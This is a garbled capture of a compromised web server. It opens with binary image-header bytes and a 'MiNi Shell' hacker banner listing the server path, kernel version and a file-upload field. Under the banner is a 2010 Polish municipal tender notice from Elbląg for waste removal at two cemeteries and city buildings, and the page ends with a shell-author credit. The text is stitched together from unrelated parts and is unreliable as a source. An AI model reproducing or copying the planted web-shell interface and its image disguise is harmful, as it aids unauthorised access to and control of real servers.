JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100701/191826-N-2010.html

<p class="kh_header"><b>Elbląg: WYWÓZ ODPADÓW KOMUNALNYCH POCHODZĄCYCH Z CMENTARZY KOMUNALNYCH ORAZ BUDYNKÓW NALEŻĄCYCH DO ZARZADU ZIELENI MIEJSKIEJ W ELBLĄGU</b><br>
<b>Numer ogłoszenia: 191826 - 2010; data zamieszczenia: 01.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Zieleni Miejskiej w Elblągu , ul. Krakusa 13-16, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 055 234 10 75, 234 20 37, faks 055 234 15 16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zzm.elblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zakład budżetowy powołany uchwałą Rady Miejskiej w Elblągu.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYWÓZ ODPADÓW KOMUNALNYCH POCHODZĄCYCH Z CMENTARZY KOMUNALNYCH ORAZ BUDYNKÓW NALEŻĄCYCH DO ZARZADU ZIELENI MIEJSKIEJ W ELBLĄGU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wywóz stałych odpadów komunalnych z terenu cmentarza komunalnego Agrykola zlokalizowanego przy ul. Agrykola 23 w Elblągu, z terenu cmentarza komunalnego Dębica zlokalizowanego przy ul. Łęczyckiej 49 w Elblągu oraz budynków należących do Zarządu Zieleni Miejskiej w Elblągu zlokalizowanych przy ul. Krakusa 13 - 16 i ul. Marymonckiej 7

Przedmiot główny:
CPV: 90.51.32.00-8
Nazewnictwo wg CPV:	Usługi wywozu stałych odpadów miejskich

Zamówienie składa się z trzech niżej wymienionych części zamówienia:

Część I zamówienia:
Wywóz stałych odpadów komunalnych z terenu cmentarza komunalnego Agrykola zlokalizowanego przy ul. Agrykola 23 w Elblągu.

Część II zamówienia:
Wywóz stałych odpadów komunalnych z terenu cmentarza komunalnego Dębica zlokalizowanego przy ul. Łęczyckiej 49 w Elblągu.

Część III zamówienia:
   Wywóz stałych odpadów komunalnych budynków należących do Zarządu Zieleni     
 Miejskiej w Elblągu zlokalizowanych przy ul. Krakusa 13 - 16 i ul. Marymonckiej 7

2.	Zakres zamówienia dla Części I obejmuje:
Ustawienie na terenie cmentarza komunalnego Agrykola w Elblągu, w miejscach       wskazanych przez Zamawiającego, pojemników i kontenerów odkrytych przystosowanych do składania stałych odpadów komunalnych powstających na terenie tego cmentarza.
Ilość i pojemność pojemników i kontenerów odkrytych, którą należy przewidzieć dla tego cmentarza przedstawia się następująco:
X	kontenery o pojemności 10 m3 - 4 szt.
X	pojemniki o pojemności 1,1 m3 - 35 szt. 
X	zamawiający dopuszcza zastąpienie pojemników o pojemności 1,1 m3 pojemnikami mniejszymi o łącznej pojemności zbliżonej do 1,1 m3       
tylko i wyłącznie w miejscach gdzie jest utrudniony dojazd do tych pojemników
*	wywóz odpadów, opróżnianie kontenerów na odpady nastąpi tylko na zgłoszenie przez Zamawiającego, w ciągu 24 godzin z pominięciem dni świątecznych i wolnych od pracy.
*	Dbanie o stan sanitarny, techniczny i estetyczny pojemników i kontenerów.
*	Oznaczenie pojemników (metodą numeracji).
*	Wykonawca na wezwanie zamawiającego w (ciągu 24 godzin z pominięciem dni świątecznych i wolnych od pracy) będzie opróżniał 16 szt. pojemników do selektywnej zbiórki odpadów ustawionych przez zamawiającego
*	Wykonawca każdorazowo  uporządkuje miejsca wokół pojemników i kontenerów po ich opróżnieniu.
*	Wykonawca uzyska potwierdzenia wykonanej usługi przez administratora cmentarza.
Wykonawca żąda wskazania części zamówienia, którą Wykonawca powierzy Podwykonawcy.

3.	Zakres zamówienia dla Części II obejmuje:
*	Ustawienie na terenie cmentarza komunalnego Dębica w Elblągu, w miejscach wskazanych przez Zamawiającego, pojemników i kontenerów odkrytych przystosowanych do składania stałych odpadów komunalnych powstających na terenie tego cmentarza.
Ilość i pojemność pojemników i kontenerów odkrytych, którą należy przewidzieć dla tego cmentarza przedstawia się następująco:
X	kontenery o pojemności 10 m3 - 21 szt.
X	pojemniki o pojemności 1,1 m3 - 110 szt.
X	zamawiający dopuszcza zastąpienie pojemników o pojemności 1,1 m3 pojemnikami mniejszymi o łącznej pojemności zbliżonej do 1,1 m3
                   tylko i wyłącznie w miejscach gdzie jest utrudniony dojazd do tych pojemników
X	pojemniki o pojemności 7m3 do składowania gruzu - 2 szt.

*	Wywóz odpadów, opróżnianie kontenerów na odpady nastąpi tylko na zgłoszenie przez Zamawiającego, w ciągu 24 godzin z pominięciem dni świątecznych i wolnych od pracy.
*	Dbanie o stan sanitarny, techniczny i estetyczny pojemników i kontenerów.
*	Oznaczenie pojemników (metodą numeracji).
*	Wykonawca na wezwanie zamawiającego w (ciągu 24 godzin z pominięciem dni świątecznych i wolnych od pracy) będzie opróżniał 46 szt. pojemników do selektywnej zbiórki odpadów ustawionych przez zamawiającego
*	Wykonawca każdorazowo  uporządkuje miejsca wokół pojemników i kontenerów po ich opróżnieniu.
*	Wykonawca uzyska potwierdzenia wykonanej usługi przez administratora cmentarza.
Wykonawca żąda wskazania części zamówienia, którą Wykonawca powierzy Podwykonawcy.
4.	Zakres zamówienia dla Części III obejmuje:
*	Ustawienie na terenie przyległym do budynków przy ul. Krakusa i przy                      ul. Marymonckiej w miejscach wskazanych przez Zamawiającego pojemników przystosowanych do składania stałych odpadów komunalnych 
Ilość i pojemność pojemników, którą należy przewidzieć dla tej części zamówienia przedstawia się następująco:
X	Ul. Marymoncka7: pojemniki o pojemności 1,1 m3 - 2szt

X	Ul. Krakusa 13 - 16: pojemniki o pojemności 1,1 m3 - 1 szt

wywóz odpadów nastąpi tylko na zgłoszenie przez Zamawiającego, w ciągu 24 godzin z pominięciem dni świątecznych i wolnych od pracy.
*	Dbanie o stan sanitarny, techniczny i estetyczny pojemników 
*	Wykonawca każdorazowo  uporządkuje miejsca wokół pojemników po ich opróżnieniu.

Zamawiający zaleca, aby Wykonawca zapoznał się z położeniem cmentarzy komunalnych w Elblągu, rozkładem dróg na ich terenie , oraz lokalizacją budynków należących do Zarządu Zieleni Miejskiej w Elblągu objętych przedmiotem zamówienia. 
________________________________________.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełnienia tego warunku zamawiający dokona na podstawie oświadczenia wymienionego w dziale VI SIWZ A1.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełnienia tego warunku zamawiający dokona na podstawie oświadczenia wymienionego w dziale VI SIWZ A1.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełnienia tego warunku zamawiający dokona na podstawie oświadczenia wymienionego w dziale VI SIWZ A1.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełnienia tego warunku zamawiający dokona na podstawie oświadczenia wymienionego w dziale VI SIWZ A1.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełnienia tego warunku zamawiający dokona na podstawie oświadczenia wymienionego w dziale VI SIWZ A1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A.	W celu potwierdzenia spełnienia warunków udziału w postępowaniu, o którym mowa  w art.22 ust.1 ustawy Pzp., do oferty należy załączyć:
1.	   oświadczenie Wykonawcy  o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp, wg wzoru na Zał. nr3 do SIWZ
2.	  wykaz usług wykonanych w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy, w tym okresie, z podaniem przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że usługi te zostały wykonane należycie, wg wzoru na Zał. nr5 do SIWZ  
3.	   Wykaz sprzętu przeznaczonego do transportu odpadów komunalnych, na druku wg. wzorów dla poszczególnych części zamówienia: dla Części I  Zał. nr 6a, dla Części II Zał. nr 6b, dla Części III Zał. nr 6c .
4.	  opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, ze Wykonawca jest ubezpieczony od odpowiedzialności cywilnej zakresie prowadzonej działalności związanej z przedmiotem zamówienia.

 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia    publicznego, oświadczenie o spełnianiu każdego z  warunków, o których mowa w art.   22 ust. 1 składa co najmniej jeden z tych wykonawców albo wszyscy ci Wykonawcy wspólnie.
B.	W celu wykazania spełnienia warunku udziału w postępowaniu dotyczącego braku podstaw do wykluczenia z postępowania o udzielenie  zamówienia wykonawcy w okolicznościach o których mowa w art. 24 ust.1 ustawy Pzp należy złożyć następujące dokumenty w formie oryginału lub kserokopii poświadczonych za zgodność z oryginałem przez wykonawcę lub osobę upoważnioną:
1.	Oświadczenie o braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków o których mowa w art. 24 ust.1 ust. Pzp, wg wzoru na zał. nr 4 do SIWZ (oryginał)
2.	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do
                  rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 
                  1  pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu
               składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24
               ust. 1  pkt 2 ustawy.
3.	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
4.	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie  zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub  
                  potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub
                  rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania
                 decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed  
                 upływem terminu składania ofert;
5.	Dokumenty podmiotów zagranicznych
           Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium
           Rzeczypospolitej Polskiej, przedkłada:    
           dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania
            potwierdzający, że:            
       a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej 
            niż 6 miesięcy przed upływem terminu składania ofert
       b)  nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i           
            raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego   
            organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu 
            składania ofert
      c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie  
           wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, dokumenty potwierdzające, ze Wykonawca nie podlega wykluczeniu składa każdy z wykonawców oddzielnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zzm.elblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Zieleni Miejskiej w Elblągu ul. Krakusa 13 - 16 , 82 - 300 Elbląg.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2010 godzina 10:00, miejsce: Zarząd Zieleni Miejskiej w Elblągu ul. Krakusa 13 - 16 , 82 - 300 Elbląg sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I: Wywóz stałych odpadów komunalnych z terenu cmentarza komunalnego Agrykola zlokalizowanego przy ul. Agrykola 23 w Elblągu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 905132008	Zakres zamówienia dla Części I obejmuje:
Ustawienie na terenie cmentarza komunalnego Agrykola w Elblągu, w miejscach       wskazanych przez Zamawiającego, pojemników i kontenerów odkrytych przystosowanych do składania stałych odpadów komunalnych powstających na terenie tego cmentarza.
Ilość i pojemność pojemników i kontenerów odkrytych, którą należy przewidzieć dla tego cmentarza przedstawia się następująco:
x	kontenery o pojemności 10 m3 - 4 szt.
x	pojemniki o pojemności 1,1 m3 - 35 szt. 
x	zamawiający dopuszcza zastąpienie pojemników o pojemności 1,1 m3 pojemnikami mniejszymi o łącznej pojemności zbliżonej do 1,1 m3       
tylko i wyłącznie w miejscach gdzie jest utrudniony dojazd do tych pojemników
*	wywóz odpadów, opróżnianie kontenerów na odpady nastąpi tylko na zgłoszenie przez Zamawiającego, w ciągu 24 godzin z pominięciem dni świątecznych i wolnych od pracy.
*	Dbanie o stan sanitarny, techniczny i estetyczny pojemników i kontenerów.
*	Oznaczenie pojemników (metodą numeracji).
*	Wykonawca na wezwanie zamawiającego w (ciągu 24 godzin z pominięciem dni świątecznych i wolnych od pracy) będzie opróżniał 16 szt. pojemników do selektywnej zbiórki odpadów ustawionych przez zamawiającego
*	Wykonawca każdorazowo  uporządkuje miejsca wokół pojemników i kontenerów po ich opróżnieniu.
*	Wykonawca uzyska potwierdzenia wykonanej usługi przez administratora cmentarza.
Wykonawca żąda wskazania części zamówienia, którą Wykonawca powierzy Podwykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 17.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II: Wywóz stałych odpadów komunalnych z terenu cmentarza komunalnego Dębica zlokalizowanego przy ul. Łęczyckiej 49 w Elblągu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia dla Części II obejmuje:
*	Ustawienie na terenie cmentarza komunalnego Dębica w Elblągu, w miejscach wskazanych przez Zamawiającego, pojemników i kontenerów odkrytych przystosowanych do składania stałych odpadów komunalnych powstających na terenie tego cmentarza.
Ilość i pojemność pojemników i kontenerów odkrytych, którą należy przewidzieć dla tego cmentarza przedstawia się następująco:
x	kontenery o pojemności 10 m3 - 21 szt.
x	pojemniki o pojemności 1,1 m3 - 110 szt.
x	zamawiający dopuszcza zastąpienie pojemników o pojemności 1,1 m3 pojemnikami mniejszymi o łącznej pojemności zbliżonej do 1,1 m3
                   tylko i wyłącznie w miejscach gdzie jest utrudniony dojazd do tych pojemników
x	pojemniki o pojemności 7m3 do składowania gruzu - 2 szt.

*	Wywóz odpadów, opróżnianie kontenerów na odpady nastąpi tylko na zgłoszenie przez Zamawiającego, w ciągu 24 godzin z pominięciem dni świątecznych i wolnych od pracy.
*	Dbanie o stan sanitarny, techniczny i estetyczny pojemników i kontenerów.
*	Oznaczenie pojemników (metodą numeracji).
*	Wykonawca na wezwanie zamawiającego w (ciągu 24 godzin z pominięciem dni świątecznych i wolnych od pracy) będzie opróżniał 46 szt. pojemników do selektywnej zbiórki odpadów ustawionych przez zamawiającego
*	Wykonawca każdorazowo  uporządkuje miejsca wokół pojemników i kontenerów po ich opróżnieniu.
*	Wykonawca uzyska potwierdzenia wykonanej usługi przez administratora cmentarza.
Wykonawca żąda wskazania części zamówienia, którą Wykonawca powierzy Podwykonawcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 17.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III  Wywóz stałych odpadów komunalnych budynków należących do Zarządu  Zieleni Miejskiej w Elblągu zlokalizowanych przy ul. Krakusa 13 - 16 i ul. Marymonckiej 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia dla Części III obejmuje:
*       Ustawienie na terenie przyległym do budynków przy ul. Krakusa i przy           ul. Marymonckiej w miejscach wskazanych przez Zamawiającego pojemników przystosowanych do składania stałych odpadów komunalnych 
Ilość i pojemność pojemników, którą należy przewidzieć dla tej części zamówienia przedstawia się następująco:
x	Ul. Marymoncka7: pojemniki o pojemności 1,1 m3 - 2szt

x	Ul. Krakusa 13 - 16: pojemniki o pojemności 1,1 m3 - 1 szt

wywóz odpadów nastąpi tylko na zgłoszenie przez Zamawiającego, w ciągu 24 godzin z pominięciem dni świątecznych i wolnych od pracy.
*	Dbanie o stan sanitarny, techniczny i estetyczny pojemników 
*	Wykonawca każdorazowo  uporządkuje miejsca wokół pojemników po ich opróżnieniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 13.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com